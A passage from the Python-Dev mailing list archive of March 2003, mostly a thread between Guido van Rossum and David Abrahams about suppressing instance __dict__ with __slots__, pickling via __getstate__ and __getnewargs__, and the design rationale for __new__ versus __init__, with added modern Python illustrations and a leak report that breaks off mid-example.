> from 'int' by calling the metaclass; in order to prevent instances
> of the most-derived type from getting an instance __dict__ I am
> putting an empty tuple in the class __dict__ as '__slots__'.  The
> problem with this hack is that it disables pickling of these babies:
> 
>    "a class that defines __slots__ without defining __getstate__
>     cannot be pickled"
> 
> Yes, I can define __getstate__, __setstate__, and __getinitargs__ (the
> only one that can actually do any work, since ints are immutable),
> but I was wondering if there's a more straightforward way to suppress
> the instance __dict__ in the derived classes.

Actually, even __getinitargs__ won't work, because __init__ is called
after the object is created.  In Python 2.3, you'd use __getnewargs__,
but I expect you're still bound to supporting Python 2.2 (Python 2.3
also doesn't have the error message above when pickling).

I think you could subclass the metaclass, override __new__, and delete
the bogus __getstate__ from the type's __dict__.  Then you'll get the
default pickling behavior which ignores slots; that should work just
fine in your case. :-)
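
The point about __getnewargs__ can be sketched as follows, assuming
present-day Python 3, not 2.2/2.3. Even and rebuild are hypothetical
names chosen for the illustration. rebuild() replays the first two items
returned by __reduce_ex__(2), the same hook pickle consults, so the
example does not depend on pickle locating the class by name.

```python
class Even(int):
    """int subclass whose constructor argument differs from the stored value."""
    __slots__ = ()

    def __new__(cls, half):
        # The value is fixed here; __init__ would run too late to change an int.
        return super().__new__(cls, 2 * half)

    def __getnewargs__(self):
        # Arguments to hand back to __new__ when the object is reconstructed.
        return (int(self) // 2,)


def rebuild(obj):
    """Reconstruct obj from the callable and arguments in its reduce value."""
    func, args = obj.__reduce_ex__(2)[:2]
    return func(*args)


original = Even(4)
clone = rebuild(original)
```

Without the __getnewargs__ override, the inherited int version would
pass the stored value back to __new__, which would then double it
again.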

--Guido van Rossum (home page: http://www.python.org/~guido/)


From dave@boost-consulting.com  Sun Mar 23 14:48:53 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 09:48:53 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net> (Guido
 van Rossum's message of "Sun, 23 Mar 2003 08:21:12 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <uof42i1ey.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

>> I am generating extension types derived from a type which is derived
>> from 'int' by calling the metaclass; in order to prevent instances
>> of the most-derived type from getting an instance __dict__ I am
>> putting an empty tuple in the class __dict__ as '__slots__'.  The
>> problem with this hack is that it disables pickling of these babies:
>> 
>>    "a class that defines __slots__ without defining __getstate__
>>     cannot be pickled"
>> 
>> Yes, I can define __getstate__, __setstate__, and __getinitargs__ (the
>> only one that can actually do any work, since ints are immutable),
>> but I was wondering if there's a more straightforward way to suppress
>> the instance __dict__ in the derived classes.
>
> Actually, even __getinitargs__ won't work, because __init__ is called
> after the object is created.  

...and ints are immutable.  Right.

> In Python 2.3, you'd use __getnewargs__,

Cute.  

It's almost too bad that the distinction between __new__ and __init__
is there -- as we find we need to legitimize the use of __new__ with
things like __getnewargs__ it becomes a little less clear which one
should be used, and when.  TIMTOWTDI and all that.

In the absence of clear guidelines I'm tempted to suggest that C++ got
this part right.  Occasionally we get people who think they want to
call overridden virtual functions from constructors (I presume the
analogous thing could be done safely from __init__ but not from
__new__) but that's pretty rare.  I'm interested in gaining insight
into the Pythonic thinking behind __new__/__init__; I'm sure I don't
have the complete picture.

> but I expect you're still bound to supporting Python 2.2

Yup, I think it would be bad to force my users to move to an
unreleased Python version at this point ;-)

> (Python 2.3 also doesn't have the error message above when
> pickling).

Nice. Too bad about 2.2.

> I think you could subclass the metaclass, override __new__, and delete
> the bogus __getstate__ from the type's __dict__.  Then you'll get the
> default pickling behavior which ignores slots; that should work just
> fine in your case. :-)

Ooh, that's sneaky!  But I can't quite see how it works.  The error
message I quoted at the top about __getstate__ happens when you try to
pickle an instance of the class.  If I delete __getstate__ during
__new__, it won't be there for pickle to find when I try to do the
pickling.  What will keep it from inducing the same error?

Thanks,
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From pedronis@bluewin.ch  Sun Mar 23 14:46:08 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Sun, 23 Mar 2003 15:46:08 +0100
Subject: [Python-Dev] [ot] offline
Message-ID: <009801c2f14a$f0ba2480$6d94fea9@newmexico>

I will be essentially offline for the next 2 weeks.

regards.


From dave@boost-consulting.com  Sun Mar 23 16:41:17 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 11:41:17 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <200303231546.h2NFkex04473@pcp02138704pcs.reston01.va.comcast.net> (Guido
 van Rossum's message of "Sun, 23 Mar 2003 10:46:40 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303231546.h2NFkex04473@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <uvfyayr0y.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

>> > I think you could subclass the metaclass, override __new__, and delete
>> > the bogus __getstate__ from the type's __dict__.  Then you'll get the
>> > default pickling behavior which ignores slots; that should work just
>> > fine in your case. :-)
>> 
>> Ooh, that's sneaky!  But I can't quite see how it works.  The error
>> message I quoted at the top about __getstate__ happens when you try to
>> pickle an instance of the class.  If I delete __getstate__ during
>> __new__, it won't be there for pickle to find when I try to do the
>> pickling.  What will keep it from inducing the same error?
>
> Just try it.  There are many ways to customize pickling, and if
> __getstate__ doesn't exist, pickling is done differently.

Since this doesn't work:

    >>> d = type('d', (object,), { '__slots__' : ['foo'] } )
    >>> pickle.dumps(d())

I'm still baffled as to why this works:

    >>> class mc(type):
    ...     def __new__(self, *args):
    ...             x = type.__new__(self, *args)
    ...             del args[2]['__getstate__']
    ...             return x
    ...
    >>> c = mc('c', (object,), { '__slots__' : ['foo'], '__getstate__' : lambda self: tuple() } )
    >>> pickle.dumps(c())
    'ccopy_reg\n_reconstructor\np0\n(c__main__\nc\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n.'

especially since:

    >>> dir(d) == dir(c)
    1

I don't see the logic in the source for object.__reduce__(), so where
is it?  OK, I see it in typeobject.c.  But now:

    >>> c.__getstate__
    <unbound method c.<lambda>>

OK, this seems to indicate that my attempt to remove __getstate__ from
the class __dict__ was a failure.  That explains why pickling c works,
but not why you suggested that I remove __getstate__ inside of
__new__.  Did you mean for me to do something different?

I note that c's __slots__ aren't pickled at all, which I guess was the
point of the __getstate__ requirement:

    >>> x = c()
    >>> x.foo = 1
    >>> pickle.dumps(x) == pickle.dumps(c())
    1

Fortunately, in our case the __slots__ are empty so it doesn't matter.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Sun Mar 23 21:04:16 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 23 Mar 2003 16:04:16 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: "Your message of Sun, 23 Mar 2003 11:41:17 EST."
 <uvfyayr0y.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303231546.h2NFkex04473@pcp02138704pcs.reston01.va.comcast.net>
 <uvfyayr0y.fsf@boost-consulting.com>
Message-ID: <200303232104.h2NL4GQ04819@pcp02138704pcs.reston01.va.comcast.net>

> Guido van Rossum <guido@python.org> writes:
> >> > I think you could subclass the metaclass, override __new__, and delete
> >> > the bogus __getstate__ from the type's __dict__.  Then you'll get the
> >> > default pickling behavior which ignores slots; that should work just
> >> > fine in your case. :-)

[David]
> >> Ooh, that's sneaky!  But I can't quite see how it works.  The error
> >> message I quoted at the top about __getstate__ happens when you try to
> >> pickle an instance of the class.  If I delete __getstate__ during
> >> __new__, it won't be there for pickle to find when I try to do the
> >> pickling.  What will keep it from inducing the same error?

[Guido]
> > Just try it.  There are many ways to customize pickling, and if
> > __getstate__ doesn't exist, pickling is done differently.
> 
> Since this doesn't work:
> 
>     >>> d = type('d', (object,), { '__slots__' : ['foo'] } )
>     >>> pickle.dumps(d())

Um, you're changing the rules in the middle of the game.  You said you
had an *empty* __slots__.  My recommendation only applied to that
case.  I also thought you were doing this from C, not from Python, but
I may be mistaken.

> I'm still baffled as to why this works:
> 
>     >>> class mc(type):
>     ...     def __new__(self, *args):
>     ...             x = type.__new__(self, *args)
>     ...             del args[2]['__getstate__']

Hm.  I don't think that x.__dict__ is args[2]; it's a copy, and
deleting __getstate__ from the arguments doesn't make any difference
to this example.

>     ...             return x
>     ...
>     >>> c = mc('c', (object,), { '__slots__' : ['foo'], '__getstate__' : lambda self: tuple() } )

Why are you passing a __getstate__ in?  The point was getting rid of
the __getstate__ that type.__new__ inserts.

>     >>> pickle.dumps(c())
>     'ccopy_reg\n_reconstructor\np0\n(c__main__\nc\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n.'
> 
> especially since:
> 
>     >>> dir(d) == dir(c)
>     1

I think you have been testing something very different from what you
think you did here.  dir(d) == dir(c) because they both have a
__getstate__; but d.__getstate__ is a built-in that raises an
exception, while c.__getstate__ is the lambda you passed in.

And have you tried unpickling yet?  I expect it to fail.

> I don't see the logic in the source for object.__reduce__(), so where
> is it?  OK, I see it in typeobject.c.  But now:
> 
>     >>> c.__getstate__
>     <unbound method c.<lambda>>
> 
> OK, this seems to indicate that my attempt to remove __getstate__ from
> the class __dict__ was a failure.  That explains why pickling c works,
> but not why you suggested that I remove __getstate__ inside of
> __new__.  Did you mean for me to do something different?

Yes.  I was assuming you'd do this at the C level.  To do what I
suggested in Python, I think you'd have to write this:

    class M(type):
        def __new__(cls, name, bases, dict):
            C = type.__new__(cls, name, bases, dict)
            del C.__getstate__
            return C
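
The difference between the two approaches can be sketched on a current
Python 3 interpreter.  This is only an illustration: as far as I know
modern versions no longer have type.__new__ insert a __getstate__, so
the sketch uses two placeholder attributes (marker_a, marker_b) and a
made-up metaclass name.  It shows that the class keeps its own copy of
the dict passed to type.__new__, so only deletion through the class
takes effect.

```python
class StripMarker(type):
    """Hypothetical metaclass, for illustration only."""

    def __new__(mcls, name, bases, namespace):
        new_class = type.__new__(mcls, name, bases, namespace)
        # The class holds a copy of `namespace`, so removing a key from
        # the argument dict after the fact does not change the class.
        namespace.pop("marker_a", None)
        # Deleting through the class object does change the class.
        del new_class.marker_b
        return new_class


ns = {"marker_a": 1, "marker_b": 2}
C = StripMarker("C", (object,), ns)

still_has_a = hasattr(C, "marker_a")   # deletion from the argument was ignored
still_has_b = hasattr(C, "marker_b")   # deletion through the class worked
```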

> I note that c's __slots__ aren't pickled at all, which I guess was the
> point of the __getstate__ requirement:
> 
>     >>> x = c()
>     >>> x.foo = 1
>     >>> pickle.dumps(x) == pickle.dumps(c())
>     1
> 
> Fortunately, in our case the __slots__ are empty so it doesn't matter.

Right.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Sun Mar 23 21:15:15 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 23 Mar 2003 16:15:15 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: "Your message of Sun, 23 Mar 2003 09:48:53 EST."
 <uof42i1ey.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
Message-ID: <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net>

> It's almost too bad that the distinction between __new__ and __init__
> is there -- as we find we need to legitimize the use of __new__ with
> things like __getnewargs__ it becomes a little less clear which one
> should be used, and when.  TIMTOWTDI and all that.

__new__ creates a new, initialized object.  __init__ sets some values
in an existing object.  __init__ is a regular method and can be called
to reinitialize an existing object (not that I recommend this, but the
mechanism doesn't forbid it).  It follows that immutable objects must
be initialized using __new__, since by the time __init__ is called the
object already exists and is immutable.
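
A minimal sketch of that last point, assuming a current Python 3
interpreter; Point and LatePoint are made-up names.  A tuple subclass
that wants to accept two arguments has to reshape them in __new__,
because the tuple's contents are fixed before __init__ ever runs.

```python
class Point(tuple):
    """Immutable pair; the contents are chosen in __new__."""

    def __new__(cls, x, y):
        # Pass the arguments of our choice to the immutable base class.
        return tuple.__new__(cls, (x, y))


class LatePoint(tuple):
    """Tries to do the same work in __init__, which is too late."""

    def __init__(self, x, y):
        # Never reached with two arguments: tuple.__new__ has already
        # rejected them before __init__ is called.
        pass


p = Point(1, 2)

try:
    LatePoint(1, 2)
except TypeError:
    late_failed = True
else:
    late_failed = False
```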

> In the absence of clear guidelines I'm tempted to suggest that C++ got
> this part right.

Of course you would.

I tend to think that Python's analogon to C++ constructors is __new__,
and that __init__ is a different mechanism (although it can often be
used where you would use a constructor in C++).

> Occasionally we get people who think they want to call overridden
> virtual functions from constructors (I presume the analogous thing
> could be done safely from __init__ but not from __new__)

Whether or not that can be done safely from __init__ depends on the
subclass __init__; it's easy enough to construct examples that don't
work.  But yes, for __new__ the situation is more analogous to C++,
except that AFAIK in C++ when you try that you get the base class
virtual function, while in Python you get the overridden method --
which finds an instance that is incompletely initialized.
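
One easy way to construct such a failing example, as a sketch with
made-up class names (Base, Derived) and assuming Python 3 syntax: the
base __init__ calls a method that the subclass overrides, and the
override relies on an attribute the subclass __init__ has not set yet.

```python
class Base:
    def __init__(self):
        # Dispatches to the most-derived describe(), even though the
        # subclass __init__ has not finished running yet.
        self.summary = self.describe()

    def describe(self):
        return "base"


class Derived(Base):
    def __init__(self):
        Base.__init__(self)
        self.label = "derived"      # set only after Base.__init__ returns

    def describe(self):
        return "label=" + self.label   # label does not exist yet


try:
    Derived()
except AttributeError:
    saw_half_built = True
else:
    saw_half_built = False
```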

> but that's pretty rare.  I'm interested in gaining insight into the
> Pythonic thinking behind __new__/__init__; I'm sure I don't have the
> complete picture.

__new__ was introduced to allow initializing immutable objects. It
really applies more to types implemented in C than types implemented
in Python.  But it is needed so that a Python subclass of an immutable
C base class can pass arguments of its choice to the C base class's
constructor.

> Nice. Too bad about 2.2.

Maybe the new pickling could be backported, but I fear that it depends
on some other 2.3 feature that's harder to backport, so I haven't
looked into this.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From dave@boost-consulting.com  Sun Mar 23 21:45:48 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 16:45:48 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <200303232104.h2NL4GQ04819@pcp02138704pcs.reston01.va.comcast.net> (Guido
 van Rossum's message of "Sun, 23 Mar 2003 16:04:16 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303231546.h2NFkex04473@pcp02138704pcs.reston01.va.comcast.net>
 <uvfyayr0y.fsf@boost-consulting.com>
 <200303232104.h2NL4GQ04819@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <ur88xoiyb.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

>> Guido van Rossum <guido@python.org> writes:
>> >> > I think you could subclass the metaclass, override __new__, and delete
>> >> > the bogus __getstate__ from the type's __dict__.  Then you'll get the
>> >> > default pickling behavior which ignores slots; that should work just
>> >> > fine in your case. :-)
>
> [David]
>> >> Ooh, that's sneaky!  But I can't quite see how it works.  The error
>> >> message I quoted at the top about __getstate__ happens when you try to
>> >> pickle an instance of the class.  If I delete __getstate__ during
>> >> __new__, it won't be there for pickle to find when I try to do the
>> >> pickling.  What will keep it from inducing the same error?
>
> [Guido]
>> > Just try it.  There are many ways to customize pickling, and if
>> > __getstate__ doesn't exist, pickling is done differently.
>> 
>> Since this doesn't work:
>> 
>>     >>> d = type('d', (object,), { '__slots__' : ['foo'] } )
>>     >>> pickle.dumps(d())
>
> Um, you're changing the rules in the middle of the game.  You said you
> had an *empty* __slots__.  

I did.  I just stuck something in there so I could verify that things
were working in the expected way.

> My recommendation only applied to that case.  I also thought you
> were doing this from C, not from Python, but I may be mistaken.

You're not mistaken; just as Python gives a productivity boost over
C/C++ for ordinary programming, I find I can learn a lot more about
the Python core in a short period of time by writing Python code than
by writing 'C' code, so I usually try that first.

>> I'm still baffled as to why this works:
>> 
>>     >>> class mc(type):
>>     ...     def __new__(self, *args):
>>     ...             x = type.__new__(self, *args)
>>     ...             del args[2]['__getstate__']
>
> Hm.  I don't think that x.__dict__ is args[2]; it's a copy, and
> deleting __getstate__ from the arguments doesn't make any difference
> to this example.

...as I discovered...

>>     ...             return x
>>     ...
>>     >>> c = mc('c', (object,), { '__slots__' : ['foo'], '__getstate__' : lambda self: tuple() } )
>
> Why are you passing a __getstate__ in?  The point was getting rid of
> the __getstate__ that type.__new__ inserts.

Because I didn't understand your intention, nor did I know that the
automatic __getstate__ was responsible for generating the error
message.  I thought the idea was to define a __getstate__, which is a
known way to suppress the error message, and then kill it in __new__.
I figured that pickle was looking for __getstate__ and when it wasn't
there but __slots__ was, raising the exception.  This may explain why I
didn't see how the approach could work.

Now I understand what you meant.

>>     >>> pickle.dumps(c())
>>     'ccopy_reg\n_reconstructor\np0\n(c__main__\nc\np1\nc__builtin__\nobject\np2\nNtp3\nRp4\n.'
>> 
>> especially since:
>> 
>>     >>> dir(d) == dir(c)
>>     1
>
> I think you have been testing something very different from what you
> think you did here.  dir(d) == dir(c) because they both have a
> __getstate__; but d.__getstate__ is a built-in that raises an
> exception, while c.__getstate__ is the lambda you passed in.

Yeah, I found that out below.

> And have you tried unpickling yet?  I expect it to fail.

Nope.

>> I don't see the logic in the source for object.__reduce__(), so where
>> is it?  OK, I see it in typeobject.c.  But now:
>> 
>>     >>> c.__getstate__
>>     <unbound method c.<lambda>>
>> 
>> OK, this seems to indicate that my attempt to remove __getstate__ from
>> the class __dict__ was a failure.  That explains why pickling c works,
>> but not why you suggested that I remove __getstate__ inside of
>> __new__.  Did you mean for me to do something different?
>
> Yes.  I was assuming you'd do this at the C level.  To do what I
> suggested in Python, I think you'd have to write this:
>
>     class M(type):
>         def __new__(cls, name, bases, dict):
>             C = type.__new__(cls, name, bases, dict)
>             del C.__getstate__
>             return C

I tried to get too fancy with del C.__dict__['__getstate__'] which
didn't work of course.  Anyway, thanks for spelling it out for me.  I
think I understand everything now.
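
For the record, a small sketch of why the fancy spelling fails, assuming
a current Python 3 interpreter (where the class __dict__ is exposed as a
read-only proxy); the class and attribute names are placeholders.

```python
class C:
    attr = 1


try:
    # The class __dict__ is a read-only view, so item deletion is refused.
    del C.__dict__["attr"]
except TypeError:
    proxy_refused = True
else:
    proxy_refused = False

# Going through the class itself is the supported spelling.
del C.attr
```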

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From dave@boost-consulting.com  Sun Mar 23 21:53:09 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 16:53:09 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net> (Guido
 van Rossum's message of "Sun, 23 Mar 2003 16:15:15 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <uof41oim2.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

>> It's almost too bad that the distinction between __new__ and
>> __init__ is there -- as we find we need to legitimize the use of
>> __new__ with things like __getnewargs__ it becomes a little less
>> clear which one should be used, and when.  TIMTOWTDI and all that.
>
> __new__ creates a new, initialized object.  __init__ sets some values
> in an existing object.  __init__ is a regular method and can be called
> to reinitialize an existing object (not that I recommend this, but the
> mechanism doesn't forbid it).  It follows that immutable objects must
> be initialized using __new__, since by the time __init__ is called the
> object already exists and is immutable.

Shouldn't most objects be initialized by __new__, really?  IME it's
dangerous to have uninitialized objects floating about, especially in
the presence of exceptions.

>> In the absence of clear guidelines I'm tempted to suggest that C++ got
>> this part right.
>
> Of course you would.

Oh, c'mon.  C++ is ugly, both brittle *and* inflexible, expensive,
painful, etc.  There must be at least _one_ well-designed thing about
it.  Maybe this is it!

> I tend to think that Python's analogon to C++ constructors is
> __new__,

Yup.

> and that __init__ is a different mechanism (although it can often be
> used where you would use a constructor in C++).
>
>> Occasionally we get people who think they want to call overridden
>> virtual functions from constructors (I presume the analogous thing
>> could be done safely from __init__ but not from __new__)
>
> Whether or not that can be done safely from __init__ depends on the
> subclass __init__; it's easy enough to construct examples that don't
> work.  But yes, for __new__ the situation is more analogous to C++,
> except that AFAIK in C++ when you try that you get the base class
> virtual function, while in Python you get the overridden method --
> which finds an instance that is incompletely initialized.

Either one seems equally likely to be what you don't want.

>> but that's pretty rare.  I'm interested in gaining insight into the
>> Pythonic thinking behind __new__/__init__; I'm sure I don't have the
>> complete picture.
>
> __new__ was introduced to allow initializing immutable objects. It
> really applies more to types implemented in C than types implemented
> in Python.  But it is needed so that a Python subclass of an immutable
> C base class can pass arguments of its choice to the C base class's
> constructor.
>
>> Nice. Too bad about 2.2.
>
> Maybe the new pickling could be backported, but I fear that it depends
> on some other 2.3 feature that's harder to backport, so I haven't
> looked into this.

Are people who don't want to upgrade really that much more willing if
it doesn't involve a minor revision number?  I figure that if I
supported 2.2 once, I'd have to be very circumspect about doing
something which required an upgrade to 2.2.x.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Sun Mar 23 22:33:59 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 23 Mar 2003 17:33:59 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: "Your message of Sun, 23 Mar 2003 16:53:09 EST."
 <uof41oim2.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net>
 <uof41oim2.fsf@boost-consulting.com>
Message-ID: <200303232233.h2NMXx905265@pcp02138704pcs.reston01.va.comcast.net>

[David]
> >> It's almost too bad that the distinction between __new__ and
> >> __init__ is there -- as we find we need to legitimize the use of
> >> __new__ with things like __getnewargs__ it becomes a little less
> >> clear which one should be used, and when.  TIMTOWTDI and all that.

[Guido]
> > __new__ creates a new, initialized object.  __init__ sets some values
> > in an existing object.  __init__ is a regular method and can be called
> > to reinitialize an existing object (not that I recommend this, but the
> > mechanism doesn't forbid it).  It follows that immutable objects must
> > be initialized using __new__, since by the time __init__ is called the
> > object already exists and is immutable.

[David again]
> Shouldn't most objects be initialized by __new__, really?  IME it's
> dangerous to have uninitialized objects floating about, especially in
> the presence of exceptions.

Normally, there are no external references to an object until after
__init__ returns, so you should be safe unless __init__ saves a
reference to self somewhere.  It does mean that __del__ can be
surprised by an uninitialized object, and that's a known pitfall.
And an exception in the middle of __new__ has the same problem.
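
A sketch of the __del__ pitfall, assuming CPython 3 (where the
half-built object is normally reclaimed as soon as the exception is
cleared; other implementations may call __del__ later).  Resource and
the events list are made up for the illustration.  The defensive
getattr() is one way to cope with attributes that __init__ never got to
set.

```python
import gc

events = []   # records what __del__ saw, for illustration only


class Resource:
    def __init__(self, fail):
        if fail:
            raise ValueError("init failed before self.handle was set")
        self.handle = "open"

    def __del__(self):
        # __init__ may have raised early, so do not assume the
        # attribute exists.
        events.append(getattr(self, "handle", None))


try:
    Resource(fail=True)
except ValueError:
    pass
gc.collect()          # belt and braces; refcounting usually suffices

r = Resource(fail=False)
del r
gc.collect()
```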

So I don't think __new__ is preferred over __init__, unless you need a
feature that only __new__ offers (like initializing an immutable base
class or returning an existing object or an object of a different
class).
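
As an illustration of the "returning an existing object" case, here is a
minimal interning sketch, assuming Python 3; Symbol and its _cache are
hypothetical names.  This cannot be done from __init__, which only ever
sees the object that was already created.

```python
class Symbol:
    """Interned names: equal names share one object."""

    _cache = {}

    def __new__(cls, name):
        try:
            # Hand back the existing object instead of making a new one.
            return cls._cache[name]
        except KeyError:
            self = object.__new__(cls)
            self.name = name
            cls._cache[name] = self
            return self


a = Symbol("spam")
b = Symbol("spam")
c = Symbol("eggs")
```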

> >> In the absence of clear guidelines I'm tempted to suggest that C++ got
> >> this part right.
> >
> > Of course you would.
> 
> Oh, c'mon.  C++ is ugly, both brittle *and* inflexible, expensive,
> painful, etc.  There must be at least _one_ well-designed thing about
> it.  Maybe this is it!

You said it. :-)

> > I tend to think that Python's analogon to C++ constructors is
> > __new__,
> 
> Yup.
> 
> > and that __init__ is a different mechanism (although it can often be
> > used where you would use a constructor in C++).
> >
> >> Occasionally we get people who think they want to call overridden
> >> virtual functions from constructors (I presume the analogous thing
> >> could be done safely from __init__ but not from __new__)
> >
> > Whether or not that can be done safely from __init__ depends on the
> > subclass __init__; it's easy enough to construct examples that don't
> > work.  But yes, for __new__ the situation is more analogous to C++,
> > except that AFAIK in C++ when you try that you get the base class
> > virtual function, while in Python you get the overridden method --
> > which finds an instance that is incompletely initialized.
> 
> Either one seems equally likely to be what you don't want.

Yeah, this is something where you can't seem to win. :-(

> >> but that's pretty rare.  I'm interested in gaining insight into the
> >> Pythonic thinking behind __new__/__init__; I'm sure I don't have the
> >> complete picture.
> >
> > __new__ was introduced to allow initializing immutable objects. It
> > really applies more to types implemented in C than types implemented
> > in Python.  But it is needed so that a Python subclass of an immutable
> > C base class can pass arguments of its choice to the C base class's
> > constructor.
> >
> >> Nice. Too bad about 2.2.
> >
> > Maybe the new pickling could be backported, but I fear that it depends
> > on some other 2.3 feature that's harder to backport, so I haven't
> > looked into this.
> 
> Are people who don't want to upgrade really that much more willing if
> it doesn't involve a minor revision number?  I figure that if I
> supported 2.2 once, I'd have to be very circumspect about doing
> something which required an upgrade to 2.2.x.

The idea is that an upgrade from 2.2.x to 2.2.(x+1) won't break any
code, it will only fix bugs.  For example, Zope requires Python 2.2.1
because of a particular bug in Python 2.2[.0] that caused Zope core
dumps.  Of course, the "breaks no code" promise can't be true 100%
(because some code could depend on a bug), but we try a lot harder not
to break stuff than with a 2.x to 2.(x+1).  Even though there we also
try not to break stuff, we're less anal about it (otherwise the
language would just get uglier and uglier by maintaining strict
backwards compatibility with all past mistakes).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From dave@boost-consulting.com  Sun Mar 23 23:18:26 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 18:18:26 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <200303232233.h2NMXx905265@pcp02138704pcs.reston01.va.comcast.net> (Guido
 van Rossum's message of "Sun, 23 Mar 2003 17:33:59 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>
 <uof42i1ey.fsf@boost-consulting.com>
 <200303232115.h2NLFFA04846@pcp02138704pcs.reston01.va.comcast.net>
 <uof41oim2.fsf@boost-consulting.com>
 <200303232233.h2NMXx905265@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <uhe9toenx.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

> [Guido]
>> > __new__ creates a new, initialized object.  __init__ sets some values
>> > in an existing object.  __init__ is a regular method and can be called
>> > to reinitialize an existing object (not that I recommend this, but the
>> > mechanism doesn't forbid it).  It follows that immutable objects must
>> > be initialized using __new__, since by the time __init__ is called the
>> > object already exists and is immutable.
>
> [David again]
>> Shouldn't most objects be initialized by __new__, really?  IME it's
>> dangerous to have uninitialized objects floating about, especially in
>> the presence of exceptions.
>
> Normally, there are no external references to an object until after
> __init__ returns

Good point; that's a feature you don't get unless you build two-phase
initialization into the core language.  Two-phase initialization is
more dangerous in C++ because it's not a core language feature.

> so you should be safe unless __init__ saves a reference to self
> somewhere.  It does mean that __del__ can be surprised by an
> uninitialized object, and that's a known pitfall.  And an exception
> in the middle of __new__ has the same problem.

C++ deals with that by only destroying the fully-initialized bases and
subobjects when an exception is thrown during construction.  That's
hard to do in the presence of two-phase initialization, though.  It
may be less of a problem for Python because __del__ is much less
commonly needed than nontrivial destructors are in C++.

> So I don't think __new__ is preferred over __init__, unless you need a
> feature that only __new__ offers (like initializing an immutable base
> class or returning an existing object or an object of a different
> class).

In other words, TIMTOWTDI? <0.3 wink>

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From tismer@tismer.com  Mon Mar 24 12:40:44 2003
From: tismer@tismer.com (Christian Tismer)
Date: Mon, 24 Mar 2003 13:40:44 +0100
Subject: [Python-Dev] funny leak
Message-ID: <3E7EFCCC.2090202@tismer.com>

Hi Tim et al,

I just tested generators and found a memory leak.
(Has nothing to do with generators).
The following code adds one to the overall refcount
and gc cannot reclaim it.

def conjoin(gs):
     def gen():
         gs      # unbreakable cycle
         gen     # unless one is commented out

Should I send a bug report, or is this known?

The above holds for Python 2.2.2 up to the current CVS
version.
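
The cycle itself can be made visible with a weak reference.  This is a
sketch under the assumption of a current CPython 3, not a reproduction
of the leak reported above: it only shows that gen is kept alive by its
own closure cell after conjoin() returns, and that the cycle collector
can reclaim it.  Returning the weak reference is an addition made for
the demonstration.

```python
import gc
import weakref


def conjoin(gs):
    def gen():
        gs      # free variable captured in a cell
        gen     # gen's own cell refers back to gen: a reference cycle
    # Return only a weak reference, so nothing outside the cycle
    # keeps gen alive.
    return weakref.ref(gen)


gc.disable()                      # keep the collector from running early
ref = conjoin(1)
alive_before = ref() is not None  # refcounting alone cannot free it
gc.collect()
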